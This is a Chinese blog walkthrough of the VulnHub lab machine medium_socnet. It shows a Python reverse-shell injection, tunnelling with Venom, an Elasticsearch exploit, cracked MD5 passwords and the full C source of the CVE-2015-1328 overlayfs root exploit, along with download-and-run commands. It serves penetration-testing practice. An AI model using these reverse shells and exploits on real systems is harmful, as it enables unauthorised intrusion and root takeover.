靶机系列-----medium_socnet

已于 2023-05-17 17:00:42 修改
阅读量312 收藏 1
点赞数
文章标签: linux 运维 服务器
于 2023-05-17 16:50:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43993545/article/details/130729515
版权

​声明

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。 

靶机地址:

https://www.vulnhub.com/entry/boredhackerblog-social-network,454/

1.1主机发现

sudo arp-scan -l

1.2端口扫描

nmap -p-  192.168.5.122

nmap -p 22,5000  -sV   192.168.5.122
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-13 03:00 EST
Nmap scan report for 192.168.5.122 (192.168.5.122)
Host is up (0.00058s latency).
​
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
​
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.52 seconds

 运行的 python2  环境

1.3路径爬取

对  http://192.168.5.213:8080/    进行查看

爆破路径

dirsearch  -u  http://192.168.5.122:5000/

发现了  http://192.168.5.122:5000/admin   路径

1.4代码注入

利用 此 输入框  导入一些  反弹shell 代码

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.5.73",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
nc -lvnp 4444

成功 反弹到 shell

发现 是一个 docker 容器

1.5内网信息收集

发现 ip  为   172.17.0.3  

使用一个脚本来 ping

for i in $(seq 1 10); do ping -c 1 172.17.0.$i ; done

发现了 两个 ip   172.17.0.2   172.17.0.1

1.6内网穿透

需要使用   Venom 工具 搭建代理

cd Venom
mv  agent_linux_x64  a    
python3 -m  http.server 80
wget http://192.168.5.73/a   //靶机下载a
chmod 777  admin_linux_x64
sudo  ./admin_linux_x64  -lport  9999
chmod 777 a
./a  -rhost 192.168.5.73  -rport 9999
goto 1
socks 1080

配置成功了

sudo  vim  /etc/proxychains4.conf[ProxyList]socks5   127.0.0.1  1080

1.7容器探测

proxychains    nmap  -Pn -sT 172.17.0.1

proxychains    nmap  -Pn  -sT -p22,5000 -sV     172.17.0.1

发现一样的   然后需要用 浏览器去访问

首先需要去配置代理  

访问   http://172.17.0.1:5000/  

发现了 熟悉的界面   仍然访问  http://172.17.0.1:5000/admin

还是要用到 上述 反弹shell  代码

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.5.73",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);nc -lvnp 5555

但是并没有什么结果!!!!!!!!!!!!!!!!!!!!!!!

然后对  172.17.0.2  进行扫描测试

proxychains    nmap  -Pn -sT 172.17.0.2

proxychains    nmap  -Pn -sT  -p9200   -sV   172.17.0.2

发现运行着  Elasticsearch  服务

1.8漏洞利用

searchsploit Elasticsearch

分析 代码, 执行 代码

cp  /usr/share/exploitdb/exploits/linux/remote/36337.py .
proxychains   python2  36337.py   172.17.0.2

拿到  172.17.0.2 容器 的权限

1.9密码破解

cat  passwords

拿到  账号密码

john:3f8184a7343664553fcb5337a3138814        1337hacktest:861f194e9d6118f3d942a72be3e51749        1234testadmin:670c3bbc209a18dde5446e5e6c1f1d5b       1111passroot:b3d34352fc26117979deabdf1b9b6354        1234passjane:5c158b60ed97c723b673529b8a3cf72b        1234jane

https://www.somd5.com/  利用 此在线网站 破解  md5    破解 出来密码

拿到账号密码 直接登录

1.10本地提权(内核漏洞)

ssh  john@192.168.5.122   //密码为  1337hack

登录成功!!!!!!!!!!!!!!!!

uname -a

searchsploit linux 3.13
cp  /usr/share/exploitdb/exploits/linux/local/37292.c .
vim  37292.c
gcc -o exp 37292.c

修改 代码

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
​
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT
​
user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)
​
greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/
​
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>
​
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"
​
static char child_stack[1024*1024];
​
static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);
​
    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";
​
    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");
​
    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }
​
    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}
​
int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;
​
    fprintf(stderr,"spawning threads\n");
​
    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");
​
        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }
​
            waitpid(pid, &status, 0);
​
        }
​
        waitpid(init, &status, 0);
        return 0;
    }
​
    usleep(300000);
​
    wait(NULL);
​
    fprintf(stderr,"child threads done\n");
​
    fd = open("/etc/ld.so.preload",O_WRONLY);
​
    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }
​
    fprintf(stderr,"/etc/ld.so.preload created\n");
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}

cp  /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so .
python3 -m  http.server 80
wget http://192.168.5.73/exp
wget http://192.168.5.73/ofs-lib.so
mv  * /tmp/
cd /tmp
./exp

拿到 靶机的 最高权限!!!!!!成功!!!!!!!!!!!!!!!!

关注微信公众号“嗨嗨安全”,获取靶机资源。

提供网络安全资料与工具,分享攻防实战经验和思路。

Naturehi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
medium_socnet靶场
wcl20010的博客
05-02 2725
1.主机发现 arp-scan -l nmap -p 1-65535 -A 192.168.128.140 发现的22 5000端口 通过服务级别的探测 nmap -p22,5000 -sV 192.168.128.140 2.漏洞发现 发现一个信息:说明服务使用python的脚本编写 Werkzeug httpd 0.14.1 (Python 2.7.15) 知道一个网页,发现不到信息尝试进行目录扫描,使用工具dirb或者dirsearch dirsearch -u http://
medium_socnet内网穿透靶机(解决5000扫描不到,和虚拟机启动成功问题)
一大口木的博客
09-22 539
我们导入我们下载号的靶机自作聪明,改了一下路径,不知道行不行点击导入这边就有了设置选择跟我一样的然后启动。。。。。上网上搜索,去关掉这个然后。。。。打开终端(以管理员身份运行)还不行~直到第二天,他提醒我下载最新版,你下载你年份的最新版就行。
漏洞靶场实战-Vuluhub medium_socnet
最新发布
qq_44005305的博客
05-15 808
Vulnhub 是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地 VM 打开即可,但是很多靶场不兼容 Vmware 比如本次用的靶场就不兼容,所以推荐 VirtualBox下载的是一个 ovf 后缀的文件,打开 VirtualBox,导入导入完毕后根据需求编辑虚拟机设置。
渗透测试--medium_socnet
weixin_44727454的博客
06-09 896
通过对medium_socnet靶机的渗透测试,了解关于内网渗透和关于Docker逃逸的知识。通过web层面的代码执行漏洞,执行python反弹shell获取shell。发现是在docker环境中。通过Vemon建立隧道,对内网进行主机发现和端口扫描,获取敏感文件找到真实主机的ssh登录用户和密码,最后通过Linux内核提权获取该靶机的root权限。...
【vulhub靶场】medium_socnet
今天是几号的博客
03-24 886
显示缺少libstdc++库,尝试能不能 apt-get install libstdc++6 一下,答案是没有权限,那么能不能从kali上把该库文件复制过来使用呢?复制过来需要放到/usr/lib/目录下,不然程序无法正常调用,然而该目录是禁止普通用户访问的。Dockerfile 是一个文本文件,其内包含了一条条的指令(Instruction),每一条指令构建一层,因此每一条指令的内容,就是描述该层应当如何构建。服务端连接成功,获取到了一个会话,进入这个会话中,开启一个 socks 代理。
sx:快速强大易于使用的现代化网络扫描器
m0_59598029的博客
08-02 107
运行速度比Nmap要快30倍;ARP扫描:支持扫描本地网络以检测活动设备;ICMP扫描:使用高级ICMP扫描技术来检测活动主机和防火墙规则;TCP SYN扫描:传统半开放扫描以查找开放TCP端口;TCP FIN/NULL/XMAS扫描:扫描某些防火墙绕过技术;自定义TCP扫描:发送任意形式数据包,并获得回复数据包中设置的所有TCP标志的结果;UDP扫描:扫描UDP端口并获取全部ICMP响应,以检测开放端口和防火墙规则;
CFS.zip_CFS-GA_cfs
09-21
**CFS加密算法详解** CFS(Chaffing and Winnowing)是一种基于混沌理论的文件加密算法,由Stanford大学的John L. Hennessy和David A. Patterson提出。该算法结合了“Chaffing”(添加混淆数据)和“Winnowing”...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
medium_socnet
果粒程
11-21 853
vulnhub-medium_socnet靶机打靶过程
0x01-medium_socnet
rec09er的博客
04-09 5378
靶机介绍:https://www.vulnhub.com/entry/boredhackerblog-social-network,454/ 靶机下载地址:https://download.vulnhub.com/boredhackerblog/medium_socnet.ova 通关目标:拿下目标靶机的root权限 攻击机:kali 目标靶机:medium_socnet 涉及攻击方法: ● 主机发现 ● 端口服务扫描 ● web侦查 ● 目录扫描 ● 代码注入 ● 反弹shell ● 内网信息搜集 ● 内
medium_socnet靶场之代码注入、内网信息收集、内网穿透、Werkzeug协议、本地提权
qq_40898302的博客
04-28 243
靶机地址:主机发现端口扫描服务发现路径爬取代码注入Shell脚本内网信息收集内网穿透漏洞利用密码破解本地提权攻击代码修改Werkzeug协议基于python语言开发的底层框架。
打靶第一周-Medium_socialnetwork
wcwdnmdnmd的博客
09-12 1488
靶机-Medium_socialnetwork靶机地址攻击手段开始攻击 靶机地址 Medium_socialnetwork 攻击手段 主机发现 端口扫描 服务发现 路径爬取 代码注入 Shell脚本 内网信息收集 内网穿透 漏洞利用 密码破解 本地提权 攻击代码修改 开始攻击 首先ifconfig查看自己ip 扫描网段,发现目标主机。nmap 10.155.211.0/24。可看到开启了22,5000端口。 扫描端口,查看服务。nmap 10.155.211.171 -p22,5000 -s
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权
weixin_50815573的博客
03-03 4529
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权 搭建测试靶机 下载地址:DC: 3.2 ~ VulnHub 则靶机DC-3 ip:192.168.1.106(NAT连接) 攻击机kali linux ip:192.168.1.237 信息收集 使用:nmap -sP 192.168.0.0/24 进行扫描找到目标靶机 对目标靶机进行端口扫描 利用nmap对目标主机进行端口扫描,发现开放端口:80 使用命令:nmap -A -p- -T4 192.168.1.106
VulnHub----DC1靶场记录
x1871329637的博客
04-26 3184
00-环境介绍 靶机下载地址:DC: 1 ~ VulnHub 攻击机:kali2022:192.168.200.129 DC1:192.168.200.135 目标:拿到5个flag 1由于这是一次黑盒测试所以只能根据目标mac地址来确认靶机的ip信息 由此判定靶机ip为192.168.200.135 2nmap直接扫 nmap -A 192.168.200.135 -p 1-65535 由此可见开放了22 80 111 42892端口,可以先去访问一下80端口 .
medium-socnet靶机打靶过程及思路
qq_52610024的博客
04-02 3946
1.cp/usr/share/exploitdb/exploits/linux/remote/36337.py.------复制代码到根目录下。2.查看目标端口的服务信息proxychainsnmap-p22,5000-sT-sV-Pn172.17.0.1。2.使用脚本开始攻击------proxychainspython236337.py172.17.0.2。⑦ssh登录john----sshjohn@10.0.2.5准备进行提权操作。...
kali之vulhub,medium_socnet
weixin_54431413的博客
05-06 1851
一、部署环境 二、进行主机发现,arp-scan进行扫描 三、使用nmap扫描发现的靶机IP 四、扫目录(dirsearch脚本;和windous御剑类似) 五、跳出docker容器系统隔离环境 六、内网穿透 七、对内网地址172.17.0.1进行扫描 八、对内网地址172.17.0.2进行扫描 九、利用开放的22端口ssh服务 十、提权 十一、成功拿到宿主机root权限
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值